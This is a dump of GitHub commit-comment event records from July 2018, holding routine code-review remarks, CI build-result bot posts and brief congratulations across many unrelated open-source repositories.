{"id":"7972962645","type":"CommitCommentEvent","actor":{"login":"Synchro"},"repo":{"name":"PHPMailer/PHPMailer"},"payload":{"comment":{"id":29726470,"position":43,"line":1079,"path":"src/SMTP.php","commit_id":"f4d37028af4b2f596847534566344b21d9b48b0d","created_at":"2018-07-16T21:05:15Z","updated_at":"2018-07-16T21:05:15Z","author_association":"MEMBER","body":"Well *something* is using up your FDs, and you've already established it's not PHPMailer. IME, file descriptor limits are set way too low by default in most distros; I usually raise the default 1k to at least 100k. Simply running apache with no clients uses several hundred, mysql will use thousands very easily. It's worth investigating further as there are quite a lot of downsides to using 5.2.x now, many other things have been fixed."}},"created_at":"2018-07-16T21:05:15Z"}
{"id":"7972964393","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29726474,"position":null,"line":null,"path":null,"commit_id":"7bf28dd1180fb5c4e409fcd2aacc3d7fdca72e00","created_at":"2018-07-16T21:05:37Z","updated_at":"2018-07-16T21:05:37Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-win32-master Continuous [Build 229](http://build.palaso.org/viewLog.html?buildId=124884&buildTypeId=Liblcm_LiblcmWin32masterContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 2608, ignored: 44 Build time: 00:01:37"}},"created_at":"2018-07-16T21:05:37Z"}
{"id":"7972966612","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29726478,"position":null,"line":null,"path":null,"commit_id":"7bf28dd1180fb5c4e409fcd2aacc3d7fdca72e00","created_at":"2018-07-16T21:06:08Z","updated_at":"2018-07-16T21:06:08Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-win64-master Continuous [Build 194](http://build.palaso.org/viewLog.html?buildId=124886&buildTypeId=Liblcm_LiblcmWin64masterContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 2608, ignored: 44 Build time: 00:01:57"}},"created_at":"2018-07-16T21:06:08Z"}
{"id":"7972967653","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29726480,"position":null,"line":null,"path":null,"commit_id":"7bf28dd1180fb5c4e409fcd2aacc3d7fdca72e00","created_at":"2018-07-16T21:06:21Z","updated_at":"2018-07-16T21:06:21Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-linux64-master Continuous [Build 196](http://build.palaso.org/viewLog.html?buildId=124885&buildTypeId=Liblcm_LiblcmLinux64masterContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 2620, ignored: 32 Build time: 00:02:12"}},"created_at":"2018-07-16T21:06:21Z"}
{"id":"7972968957","type":"CommitCommentEvent","actor":{"login":"juancampa"},"repo":{"name":"aranajhonny/membrane-driver-gmail"},"payload":{"comment":{"id":29726484,"position":26,"line":284,"path":"index.js","commit_id":"42a4d4e65d2cd99463d3ef3ba371770282080b2a","created_at":"2018-07-16T21:06:38Z","updated_at":"2018-07-16T21:06:38Z","author_association":"NONE","body":"options should be `program.endpoints.webhooks.url`"}},"created_at":"2018-07-16T21:06:38Z"}
{"id":"7972971263","type":"CommitCommentEvent","actor":{"login":"naveenreddy5568"},"repo":{"name":"VeridicSolutionsOrg/Veridic_Atlanta"},"payload":{"comment":{"id":29726487,"position":null,"line":null,"path":null,"commit_id":"fe607cbdb4a9ae1be88fa14abed26cf79ae22191","created_at":"2018-07-16T21:07:02Z","updated_at":"2018-07-16T21:07:02Z","author_association":"COLLABORATOR","body":"d"}},"created_at":"2018-07-16T21:07:02Z"}
{"id":"7972971549","type":"CommitCommentEvent","actor":{"login":"kevinushey"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":29726489,"position":null,"line":null,"path":null,"commit_id":"9e545543166b4d6139dd6ed4e3cc185db9415c47","created_at":"2018-07-16T21:07:06Z","updated_at":"2018-07-16T21:07:06Z","author_association":"CONTRIBUTOR","body":"It does! Note that the issue with signature tooltips only occurred after executing the problematic chunk (containing `list()`); ie, it's the execution of that bit of code that seems to leave some R global state in a place where it starts mis-encoding strings."}},"created_at":"2018-07-16T21:07:06Z"}
{"id":"7972974003","type":"CommitCommentEvent","actor":{"login":"zeke"},"repo":{"name":"nice-registry/owners"},"payload":{"comment":{"id":29726494,"position":null,"line":null,"path":null,"commit_id":"91c5a82fbc0622873eaf243e780c56125b737669","created_at":"2018-07-16T21:07:35Z","updated_at":"2018-07-16T21:07:35Z","author_association":"MEMBER","body":"Hi @1990b. I'm not sure I understand your question. Can you elaborate?"}},"created_at":"2018-07-16T21:07:35Z"}
{"id":"7972974361","type":"CommitCommentEvent","actor":{"login":"xaqrox"},"repo":{"name":"radcampaign/defenders"},"payload":{"comment":{"id":29726495,"position":null,"line":null,"path":null,"commit_id":"2a126680353f1738d8ac73b50264ab425ee081e9","created_at":"2018-07-16T21:07:40Z","updated_at":"2018-07-16T21:07:40Z","author_association":"MEMBER","body":"Created multidev environment [defenders#ci-4](https://dashboard.pantheon.io/sites/0786b188-84e4-4b2f-99ec-5572fa5e8edb#ci-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-4-defenders.pantheonsite.io/)"}},"created_at":"2018-07-16T21:07:40Z"}
{"id":"7972974932","type":"CommitCommentEvent","actor":{"login":"ThePrettyNerdy"},"repo":{"name":"githubschool/open-enrollment-classes-introduction-to-github"},"payload":{"comment":{"id":29726497,"position":2,"line":2,"path":"_pins/THEPRETTYNERDY.json","commit_id":"3f10d1ae063a6298208acb1d32d08a750357d3b6","created_at":"2018-07-16T21:07:47Z","updated_at":"2018-07-16T21:07:47Z","author_association":"COLLABORATOR","body":"COMMENT.."}},"created_at":"2018-07-16T21:07:47Z"}
{"id":"7972975368","type":"CommitCommentEvent","actor":{"login":"ThePrettyNerdy"},"repo":{"name":"githubschool/open-enrollment-classes-introduction-to-github"},"payload":{"comment":{"id":29726498,"position":null,"line":null,"path":null,"commit_id":"3f10d1ae063a6298208acb1d32d08a750357d3b6","created_at":"2018-07-16T21:07:53Z","updated_at":"2018-07-16T21:07:53Z","author_association":"COLLABORATOR","body":"OKAY,"}},"created_at":"2018-07-16T21:07:53Z"}
{"id":"7972977455","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29726500,"position":null,"line":null,"path":null,"commit_id":"6d22fefb62254243e64b2bc100b0989983a260a6","created_at":"2018-07-16T21:08:19Z","updated_at":"2018-07-16T21:08:19Z","author_association":"NONE","body":"### Results for event id: 27d3a704-0f92-4586-9303-209e7767eec9\n<details><summary>DockerServerless : Deploy to Lambda (eea752) Execution completed.</summary>\n<p>\n\n**output tail (340 lines total):**\n\n```\n...\n\n\u001b[1m\u001b[33mWARNING in /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js\nModule not found: Error: Can't resolve 'mv' in '/usr/workspace/clone/node_modules/bunyan/lib'\n @ /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js 100:13-31\n @ ./src/index.js\u001b[39m\u001b[22m\n\n\u001b[1m\u001b[33mWARNING in /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js\nModule not found: Error: Can't resolve 'safe-json-stringify' in '/usr/workspace/clone/node_modules/bunyan/lib'\n @ /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js 90:28-58\n @ ./src/index.js\u001b[39m\u001b[22m\nServerless: Packaging service...\nsample-http/\nsample-http/sample-http.zip\nsample-http/serverless-state.json\nsample-http/cloudformation-template-update-stack.json\nDone in 14.81s.\nrelease package created, uploading to s3://gtmstorage4/releases/sample-http\nCompleted 256.0 KiB/873.4 KiB (640.8 KiB/s) with 1 file(s) remaining\rCompleted 512.0 KiB/873.4 KiB (1.0 MiB/s) with 1 file(s) remaining  \rCompleted 768.0 KiB/873.4 KiB (1.4 MiB/s) with 1 file(s) remaining  \rCompleted 873.4 KiB/873.4 KiB (1.1 MiB/s) with 1 file(s) remaining  \rupload: ../../output/packages/sample-http-0.0.1.tar.gz to s3://gtmstorage4/releases/sample-http/sample-http-0.0.1.tar.gz\nrelease upload completed!\nApiGateway Endpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/master/sample-http\nSuccess:  sample-http\nALL DEPLOYS SUCCESSFUL\n>>> packaging deployment output: 27d3a704-0f92-4586-9303-209e7767eec9-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/27d3a704-0f92-4586-9303-209e7767eec9-output.tar.gz\n{\n    \"ETag\": \"\\\"dc7ad78effa07efcb017545abfbc87a4\\\"\"\n}\nExecution time was 130 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-16T21:08:19Z"}
{"id":"7972978232","type":"CommitCommentEvent","actor":{"login":"viacoffee"},"repo":{"name":"ammoready/zanders"},"payload":{"comment":{"id":29726501,"position":null,"line":null,"path":null,"commit_id":"8575c24459e4539b738eb5a70906a9afcb1a3851","created_at":"2018-07-16T21:08:30Z","updated_at":"2018-07-16T21:08:30Z","author_association":"COLLABORATOR","body":"Closing the file makes sense for it's use in distributor syncing stuff I have been working on. Currently, nothing uses this method other than that."}},"created_at":"2018-07-16T21:08:30Z"}
{"id":"7972981433","type":"CommitCommentEvent","actor":{"login":"JoeYoung94"},"repo":{"name":"JoeYoung94/StringFunctions"},"payload":{"comment":{"id":29726510,"position":null,"line":null,"path":null,"commit_id":"271000a29275e805924ca713242d7a40976cdf02","created_at":"2018-07-16T21:09:14Z","updated_at":"2018-07-16T21:09:14Z","author_association":"OWNER","body":"first commit"}},"created_at":"2018-07-16T21:09:14Z"}
{"id":"7972984435","type":"CommitCommentEvent","actor":{"login":"jwilsjustin"},"repo":{"name":"ammoready/zanders"},"payload":{"comment":{"id":29726517,"position":null,"line":null,"path":null,"commit_id":"8575c24459e4539b738eb5a70906a9afcb1a3851","created_at":"2018-07-16T21:09:52Z","updated_at":"2018-07-16T21:09:52Z","author_association":"CONTRIBUTOR","body":"I'm still closing the file, just after I use it."}},"created_at":"2018-07-16T21:09:52Z"}
{"id":"7972986619","type":"CommitCommentEvent","actor":{"login":"juancampa"},"repo":{"name":"aranajhonny/membrane-driver-gmail"},"payload":{"comment":{"id":29726522,"position":32,"line":32,"path":"pubsub.js","commit_id":"42a4d4e65d2cd99463d3ef3ba371770282080b2a","created_at":"2018-07-16T21:10:20Z","updated_at":"2018-07-16T21:10:20Z","author_association":"NONE","body":"We also need `deleteSubscription` to be called from `shutdown()`"}},"created_at":"2018-07-16T21:10:20Z"}
{"id":"7972988262","type":"CommitCommentEvent","actor":{"login":"lpdmagee"},"repo":{"name":"RBVI/CyPlot"},"payload":{"comment":{"id":29726524,"position":null,"line":null,"path":null,"commit_id":"4800e89a57d86114149b196be61a2fbee51cb407","created_at":"2018-07-16T21:10:40Z","updated_at":"2018-07-16T21:10:40Z","author_association":"COLLABORATOR","body":"Note that this is for the volcano plots (Allison needed me to make this commit as her laptop was malfunctioning."}},"created_at":"2018-07-16T21:10:40Z"}
{"id":"7972989710","type":"CommitCommentEvent","actor":{"login":"jwilsjustin"},"repo":{"name":"ammoready/zanders"},"payload":{"comment":{"id":29726526,"position":null,"line":null,"path":null,"commit_id":"8575c24459e4539b738eb5a70906a9afcb1a3851","created_at":"2018-07-16T21:10:59Z","updated_at":"2018-07-16T21:10:59Z","author_association":"CONTRIBUTOR","body":"Since it returns the tempfile, you can always explicitly close it in the calling method. "}},"created_at":"2018-07-16T21:10:59Z"}
{"id":"7972991017","type":"CommitCommentEvent","actor":{"login":"viacoffee"},"repo":{"name":"ammoready/zanders"},"payload":{"comment":{"id":29726528,"position":null,"line":null,"path":null,"commit_id":"8575c24459e4539b738eb5a70906a9afcb1a3851","created_at":"2018-07-16T21:11:16Z","updated_at":"2018-07-16T21:11:16Z","author_association":"COLLABORATOR","body":"@jwilsjustin I updated the above comment "}},"created_at":"2018-07-16T21:11:16Z"}
{"id":"7972994118","type":"CommitCommentEvent","actor":{"login":"jwilsjustin"},"repo":{"name":"ammoready/zanders"},"payload":{"comment":{"id":29726535,"position":null,"line":null,"path":null,"commit_id":"8575c24459e4539b738eb5a70906a9afcb1a3851","created_at":"2018-07-16T21:11:58Z","updated_at":"2018-07-16T21:11:58Z","author_association":"CONTRIBUTOR","body":"👍 "}},"created_at":"2018-07-16T21:11:58Z"}
{"id":"7972994125","type":"CommitCommentEvent","actor":{"login":"eddietree"},"repo":{"name":"jvalen/pixel-art-react"},"payload":{"comment":{"id":29726537,"position":null,"line":null,"path":null,"commit_id":"c1e2a0a0a7acf33015fd439740e79c0d284d3399","created_at":"2018-07-16T21:11:58Z","updated_at":"2018-07-16T21:11:58Z","author_association":"NONE","body":"nice"}},"created_at":"2018-07-16T21:11:58Z"}
{"id":"7972994661","type":"CommitCommentEvent","actor":{"login":"MichaelAkkermans"},"repo":{"name":"ErdiTuncer/ChillFlix"},"payload":{"comment":{"id":29726540,"position":null,"line":null,"path":null,"commit_id":"9eed1e5520da86298dee2b74830de1918e842f2b","created_at":"2018-07-16T21:12:06Z","updated_at":"2018-07-16T21:12:06Z","author_association":"COLLABORATOR","body":"GoodBusy :-)"}},"created_at":"2018-07-16T21:12:06Z"}
{"id":"7972998157","type":"CommitCommentEvent","actor":{"login":"sungsoo86Park"},"repo":{"name":"sungsoo86Park/test"},"payload":{"comment":{"id":29726555,"position":null,"line":null,"path":null,"commit_id":"4ac758dfc0e3cb5aaf232bd251fa7503b569c6dd","created_at":"2018-07-16T21:12:49Z","updated_at":"2018-07-16T21:12:49Z","author_association":"OWNER","body":"#2 "}},"created_at":"2018-07-16T21:12:49Z"}
{"id":"7973006738","type":"CommitCommentEvent","actor":{"login":"hyosangs"},"repo":{"name":"hyosangs/TartanAdventure-master-2team"},"payload":{"comment":{"id":29726581,"position":null,"line":null,"path":null,"commit_id":"b42acd03fe88aa2532443308067086f6ac739210","created_at":"2018-07-16T21:14:41Z","updated_at":"2018-07-16T21:14:41Z","author_association":"OWNER","body":"#245 #249 #250 #254 #288 #289 #290 #309 #310 #311 #312 #313 #316 #317 #320 #321 #322 #324 #325 #326 #327 #338 #339\r\nfixed the issue above"}},"created_at":"2018-07-16T21:14:41Z"}
{"id":"7973010906","type":"CommitCommentEvent","actor":{"login":"kukulich"},"repo":{"name":"slevomat/coding-standard"},"payload":{"comment":{"id":29726589,"position":null,"line":null,"path":null,"commit_id":"fd5cb5b728d5770a362ce76e1ea7fd7fd02cf12c","created_at":"2018-07-16T21:15:34Z","updated_at":"2018-07-16T21:15:34Z","author_association":"CONTRIBUTOR","body":"Fixed in https://github.com/slevomat/coding-standard/commit/c741f67b823c06864ce111bda1938e6b22f7fcc3"}},"created_at":"2018-07-16T21:15:34Z"}
{"id":"7973011692","type":"CommitCommentEvent","actor":{"login":"hyosangs"},"repo":{"name":"hyosangs/TartanAdventure-master-2team"},"payload":{"comment":{"id":29726591,"position":null,"line":null,"path":null,"commit_id":"b3d9de61adb9bd20911e6e33fa8b74d14d0832ee","created_at":"2018-07-16T21:15:44Z","updated_at":"2018-07-16T21:15:44Z","author_association":"OWNER","body":"#304 #299 #298 #296 #293 #291 #286 #285"}},"created_at":"2018-07-16T21:15:44Z"}
{"id":"7973012506","type":"CommitCommentEvent","actor":{"login":"YyyzzzxxxI"},"repo":{"name":"YyyzzzxxxI/MindGames"},"payload":{"comment":{"id":29726592,"position":null,"line":null,"path":null,"commit_id":"9d403b55facec47a7ed763fcebf6c3b288a8d232","created_at":"2018-07-16T21:15:54Z","updated_at":"2018-07-16T21:15:54Z","author_association":"OWNER","body":"DOWNLOAD THIS GAME "}},"created_at":"2018-07-16T21:15:54Z"}
{"id":"7973014505","type":"CommitCommentEvent","actor":{"login":"hyosangs"},"repo":{"name":"hyosangs/TartanAdventure-master-2team"},"payload":{"comment":{"id":29726598,"position":null,"line":null,"path":null,"commit_id":"6947896bdd66f2b2da4234694188073c0b2bfc0f","created_at":"2018-07-16T21:16:16Z","updated_at":"2018-07-16T21:16:16Z","author_association":"OWNER","body":"#305 #300 #297 #294 #292 #287"}},"created_at":"2018-07-16T21:16:16Z"}
{"id":"7973015516","type":"CommitCommentEvent","actor":{"login":"oBusk"},"repo":{"name":"oBusk/typescript-library-boilerplate"},"payload":{"comment":{"id":29726602,"position":null,"line":null,"path":null,"commit_id":"6c9ae10842438e889160a278940918c1c5de8a04","created_at":"2018-07-16T21:16:28Z","updated_at":"2018-07-16T21:16:28Z","author_association":"OWNER","body":"Great! Good to know!\r\n\r\nFlyt inte bort i värmen 🌡 🌞 "}},"created_at":"2018-07-16T21:16:28Z"}
{"id":"7973017243","type":"CommitCommentEvent","actor":{"login":"hyosangs"},"repo":{"name":"hyosangs/TartanAdventure-master-2team"},"payload":{"comment":{"id":29726605,"position":null,"line":null,"path":null,"commit_id":"da4a10387a092d57cf629545e130bb7e064a7ef2","created_at":"2018-07-16T21:16:47Z","updated_at":"2018-07-16T21:16:47Z","author_association":"OWNER","body":"#281 #280 #279 #272 "}},"created_at":"2018-07-16T21:16:47Z"}
{"id":"7973019829","type":"CommitCommentEvent","actor":{"login":"stefanofornari"},"repo":{"name":"beanshell/beanshell"},"payload":{"comment":{"id":29726610,"position":137,"line":295,"path":"src/main/java/bsh/Interpreter.java","commit_id":"9b4d2d746f0653be93dcbb1dbc8c4a53ba3c9430","created_at":"2018-07-16T21:17:20Z","updated_at":"2018-07-16T21:17:20Z","author_association":"CONTRIBUTOR","body":"I guess what I am trying to say is that Out/Err will set the stream of a Console object, which are initialized to the original ConsoleInterface's streams passed to the constructor or setConsole() instead of the ConsoleInterface object I am passing in. This behaviour is confusing and error prone: I am supposed to provide my outputstream through the a ConsoleInterface object, but calling setOut does not actually set my out, but something else inside Interpreter... instead, since I am providing the streams I would expect that I would be able to intercept setOut/Err, which is not supported by the current interface. Therefore the question: what's the benefit of having the Console object and the corresponding re-factoring? \r\n\r\nI agree we should consider the role of Interpreter, it is doing to many things. Maybe we should deprecate the constructors that take streams and setOut/Err in favor of the constructors that take the console and setConsole().\r\nor what about leaving Interpreter as it is and create a cleaner one? The other thing that makes me think is that interpreter also Runnable... so Interpreter is not only the way to interpret and execute beanshell code, is also a console and is also a REPL task that reads the input... too many things...\r\nAnother option: do your really need to keep compatibility given that you are releasing a major update to the old beanshell?"}},"created_at":"2018-07-16T21:17:20Z"}
{"id":"7973020161","type":"CommitCommentEvent","actor":{"login":"hyosangs"},"repo":{"name":"hyosangs/TartanAdventure-master-2team"},"payload":{"comment":{"id":29726611,"position":null,"line":null,"path":null,"commit_id":"fba4bf0f67cfb3f4bd8037d31e1754f64994f076","created_at":"2018-07-16T21:17:25Z","updated_at":"2018-07-16T21:17:25Z","author_association":"OWNER","body":"#323 #318 #315 #314"}},"created_at":"2018-07-16T21:17:25Z"}
{"id":"7973021049","type":"CommitCommentEvent","actor":{"login":"dkoeplin"},"repo":{"name":"stanford-ppl/spatial"},"payload":{"comment":{"id":29726614,"position":4,"line":33,"path":"src/spatial/util/modeling.scala","commit_id":"d48b35161316f94ace1baa25d6f57e6f4177ca3e","created_at":"2018-07-16T21:17:38Z","updated_at":"2018-07-16T21:17:38Z","author_association":"CONTRIBUTOR","body":"@mattfel1 This var isn't safe - allows IR info to leak across instantiated applications, e.g. during sbt test. It's also not thread safe, since only the one object is used across apps which may be getting compiled in parallel"}},"created_at":"2018-07-16T21:17:38Z"}
{"id":"7973021694","type":"CommitCommentEvent","actor":{"login":"DennisLfromGA"},"repo":{"name":"dnschneid/crouton"},"payload":{"comment":{"id":29726615,"position":null,"line":null,"path":null,"commit_id":"f80b8bb628953510a2f59606b2ee6015daa985e5","created_at":"2018-07-16T21:17:47Z","updated_at":"2018-07-16T21:17:47Z","author_association":"COLLABORATOR","body":"I just tested bionic, trusty, and xenial and had no errors -\r\n```\r\n-rw-r--r--. 1 root root 75M Jul 16 17:04 bionic.bs\r\n-rw-r--r--. 1 root root 68M Jul 16 17:08 trusty.bs\r\n-rw-r--r--. 1 root root 74M Jul 16 17:11 xenial.bs\r\n```\r\n\r\nI used this for my tests, as an example: `crouton -r xenial -n xenial.bs -d -f xenial.bs`\r\n\r\n-**DennisLfromGA**\r\n "}},"created_at":"2018-07-16T21:17:47Z"}
{"id":"7973025206","type":"CommitCommentEvent","actor":{"login":"otacke"},"repo":{"name":"otacke/h5p-agamotto"},"payload":{"comment":{"id":29726626,"position":null,"line":null,"path":null,"commit_id":"67d1b6651002d6e68938a8527415ba4ea7983ec7","created_at":"2018-07-16T21:18:34Z","updated_at":"2018-07-16T21:18:34Z","author_association":"OWNER","body":"Hi!\r\n\r\na) Until there has not yet been an official release, you will have to update your files manually.\r\n\r\nb) Existing H5P content will not be updated automatically (although there's a solution planned). The language is set when creating the content, so you will only have translated strings for new content.\r\n\r\nBest,\r\nOliver "}},"created_at":"2018-07-16T21:18:34Z"}
{"id":"7973028889","type":"CommitCommentEvent","actor":{"login":"jmcphers"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":29726632,"position":null,"line":null,"path":null,"commit_id":"9e545543166b4d6139dd6ed4e3cc185db9415c47","created_at":"2018-07-16T21:19:20Z","updated_at":"2018-07-16T21:19:20Z","author_association":"MEMBER","body":"Whew, I thought it was happening all the time based on your screenshot! I'll pick this up for the patch release.\r\n\r\nI actually think this might warrant a re-release since everyone who uses notebooks with data outputs is going to be affected, and that's a lot of people. I'll go ahead and get one rolling."}},"created_at":"2018-07-16T21:19:20Z"}
{"id":"7973031311","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29726641,"position":null,"line":null,"path":null,"commit_id":"b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a","created_at":"2018-07-16T21:19:54Z","updated_at":"2018-07-16T21:19:54Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2323 of 2323 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.21%25-green.png)</a>\n"}},"created_at":"2018-07-16T21:19:54Z"}
{"id":"7973031358","type":"CommitCommentEvent","actor":{"login":"seldridge"},"repo":{"name":"seldridge/firrtl"},"payload":{"comment":{"id":29726642,"position":null,"line":null,"path":null,"commit_id":"800db4f3736f1edf1dc4b1eeb7612606652425c7","created_at":"2018-07-16T21:19:54Z","updated_at":"2018-07-16T21:19:54Z","author_association":"OWNER","body":"Ah, okay... I'll update the commit during a rebase (credit where credit is due!). I can attest to how `ServiceLoader` appears to be so hidden. I Googled incessantly and couldn't find a thing."}},"created_at":"2018-07-16T21:19:54Z"}
{"id":"7973036603","type":"CommitCommentEvent","actor":{"login":"metanoic"},"repo":{"name":"metanoic/ODriveClientLibrary"},"payload":{"comment":{"id":29726659,"position":null,"line":null,"path":null,"commit_id":"41977f00fe06bf8a573fde61a2b6808cd3312459","created_at":"2018-07-16T21:21:00Z","updated_at":"2018-07-16T21:21:00Z","author_association":"OWNER","body":"#38 "}},"created_at":"2018-07-16T21:21:00Z"}
{"id":"7973037767","type":"CommitCommentEvent","actor":{"login":"ibaca"},"repo":{"name":"intendia-oss/autorest"},"payload":{"comment":{"id":29726664,"position":5,"line":53,"path":"core/src/main/java/com/intendia/gwt/autorest/client/CollectorResourceVisitor.java","commit_id":"1e06d2fbd78fd83d6576c403288f1caa6964f29f","created_at":"2018-07-16T21:21:16Z","updated_at":"2018-07-16T21:21:16Z","author_association":"MEMBER","body":"It is a polemic area... I'm not sure at all that supporting empty path in a class is a good idea or not, but yep, I suppose I'll apply this change\r\nhttps://github.com/swagger-api/swagger-core/issues/1189\r\nhttps://stackoverflow.com/questions/33513654/warning-the-subresource-method-contains-empty-path-annotation\r\nhttps://stackoverflow.com/questions/34854461/jersey-annotation-path-with-empty-value-on-class-level-do-not-work"}},"created_at":"2018-07-16T21:21:16Z"}
{"id":"7973038981","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29726667,"position":null,"line":null,"path":null,"commit_id":"b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a","created_at":"2018-07-16T21:21:33Z","updated_at":"2018-07-16T21:21:33Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-16T21:21:33Z"}
{"id":"7973049922","type":"CommitCommentEvent","actor":{"login":"TheRingMaster"},"repo":{"name":"TipsyOs/frameworks_base"},"payload":{"comment":{"id":29726696,"position":null,"line":null,"path":null,"commit_id":"a53420bcd064d8f8b990a3c7587d14878928befd","created_at":"2018-07-16T21:24:00Z","updated_at":"2018-07-16T21:24:00Z","author_association":"NONE","body":"Bravo!"}},"created_at":"2018-07-16T21:24:00Z"}
{"id":"7973055501","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29726703,"position":null,"line":null,"path":null,"commit_id":"bd6dc85c21d03f47a5bbec1879b6b426a2ecfcdc","created_at":"2018-07-16T21:25:18Z","updated_at":"2018-07-16T21:25:18Z","author_association":"NONE","body":"congrats!"}},"created_at":"2018-07-16T21:25:18Z"}
{"id":"7973057877","type":"CommitCommentEvent","actor":{"login":"crossbr"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29726711,"position":null,"line":null,"path":null,"commit_id":"bd6dc85c21d03f47a5bbec1879b6b426a2ecfcdc","created_at":"2018-07-16T21:25:51Z","updated_at":"2018-07-16T21:25:51Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-16T21:25:51Z"}
{"id":"7973057940","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29726712,"position":null,"line":null,"path":null,"commit_id":"bd6dc85c21d03f47a5bbec1879b6b426a2ecfcdc","created_at":"2018-07-16T21:25:52Z","updated_at":"2018-07-16T21:25:52Z","author_association":"NONE","body":"Congratulations!"}},"created_at":"2018-07-16T21:25:52Z"}
{"id":"7973073376","type":"CommitCommentEvent","actor":{"login":"fredbuluku"},"repo":{"name":"hitbtc-com/hitbtc-api"},"payload":{"comment":{"id":29726741,"position":7,"line":1,"path":"README.md","commit_id":"8dc95b8fda406b0595bc39b46591b5d1e4ba7e23","created_at":"2018-07-16T21:29:19Z","updated_at":"2018-07-16T21:29:19Z","author_association":"NONE","body":"> I did all identification process \r\n\r\n> git please effect the change \r\n\r\n> I need access to my funds \r\n\r\n> the affected account HitBTC \r\n\r\n\r\n> git effect the change on my HitBTC account \r\n\r\n> \r\n"}},"created_at":"2018-07-16T21:29:19Z"}
{"id":"7973080842","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29726759,"position":null,"line":null,"path":null,"commit_id":"bd6dc85c21d03f47a5bbec1879b6b426a2ecfcdc","created_at":"2018-07-16T21:31:00Z","updated_at":"2018-07-16T21:31:00Z","author_association":"NONE","body":"Congratulations!  Looks like a solid Elo gain."}},"created_at":"2018-07-16T21:31:00Z"}
{"id":"7973083718","type":"CommitCommentEvent","actor":{"login":"colbyguan"},"repo":{"name":"salesforce/Argus"},"payload":{"comment":{"id":29726762,"position":63,"line":63,"path":"ArgusCore/src/test/java/com/salesforce/dva/argus/service/tsdb/AbstractTSDBServiceTest.java","commit_id":"f19c69c878e510af1d86c8de26607b4722a47fa1","created_at":"2018-07-16T21:31:38Z","updated_at":"2018-07-16T21:31:38Z","author_association":"CONTRIBUTOR","body":"I'm not exactly sure what to assert, since if it works, then it will never throw an `IndexOutOfBoundsException` and pass. There is the faulty case of being passed an empty list of endpoints, but the \"require\"s should stop that"}},"created_at":"2018-07-16T21:31:38Z"}
